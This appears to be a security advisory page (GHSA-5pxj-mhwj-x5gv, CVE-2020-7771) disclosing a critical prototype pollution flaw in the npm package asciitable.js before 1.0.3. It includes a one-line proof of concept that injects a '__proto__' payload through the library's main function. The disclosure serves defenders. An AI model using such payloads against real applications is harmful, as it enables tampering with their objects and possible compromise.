GHSA-5pxj-mhwj-x5gv
Suggest an improvement- Source
- https://github.com/advisories/GHSA-5pxj-mhwj-x5gv
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-5pxj-mhwj-x5gv/GHSA-5pxj-mhwj-x5gv.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-5pxj-mhwj-x5gv
- Aliases
-
- CVE-2020-7771
- SNYK-JS-ASCIITABLEJS-1039799
- Published
- 2021-04-13T15:24:59Z
- Modified
- 2023-11-08T04:04:09.606500Z
- Severity
-
- 9.8 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVSS Calculator
- Summary
- Prototype Pollution in asciitable.js
- Details
-
The package asciitable.js before 1.0.3 is vulnerable to Prototype Pollution via the main function.
PoC
var a = require("asciitable.js"); var b = JSON.parse('{"__proto__":{"test":123}}'); a({},b); console.log({}.test) - References
Affected packages
npm / asciitable.js
Package
- Name
- asciitable.js
- View open source insights on deps.dev
- Purl
- pkg:npm/asciitable.js